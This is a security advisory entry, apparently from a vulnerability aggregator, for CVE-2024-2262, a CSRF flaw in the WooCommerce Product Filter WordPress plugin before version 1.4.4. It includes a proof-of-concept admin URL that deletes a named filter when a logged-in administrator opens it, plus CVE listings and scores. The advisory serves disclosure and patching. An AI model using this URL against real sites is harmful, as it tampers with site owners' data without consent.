Lucene search
Erwan LR (WPScan)WPEX-ID:30544377-B90D-4762-B38A-EC89BDA0DFDCHistoryMar 11, 2024 - 12:00 a.m.
WooCommerce Product Filter < 1.4.4 - Filter Deletion via CSRF
2024-03-1100:00:00
Erwan LR (WPScan)
65
woocommerce
product filter
version 1.4.4
csrf
filter deletion
admin
url exploit
Description The plugin does not have CSRF check in its bulk action, which could allow attackers to make logged in users delete arbitrary filters via CSRF attack, granted they know the related filter slugs
Make a logged in admin open the URL below to make them delete the filter with the slug test1:
https://example.com/wp-admin/admin.php?page=wpf_search&action=delete&paged=1&wpf_post[]=test1&action2=deleteRelated
cvelist
cvelist
CVE-2024-2262 WooCommerce Product Filter < 1.4.4 - Filter Deletion via CSRF
2024-04-01 05:00:01
nvd
nvd
CVE-2024-2262
2024-04-01 05:15:07
wpvulndb
wpvulndb
WooCommerce Product Filter < 1.4.4 - Filter Deletion via CSRF
2024-03-11 00:00:00
vulnrichment
vulnrichment
CVE-2024-2262 WooCommerce Product Filter < 1.4.4 - Filter Deletion via CSRF
2024-04-01 05:00:01
cve
cve
CVE-2024-2262
2024-04-01 05:15:07
AI Score
6.9
Confidence
High
EPSS
0
Percentile
9.0%
Related for WPEX-ID:30544377-B90D-4762-B38A-EC89BDA0DFDC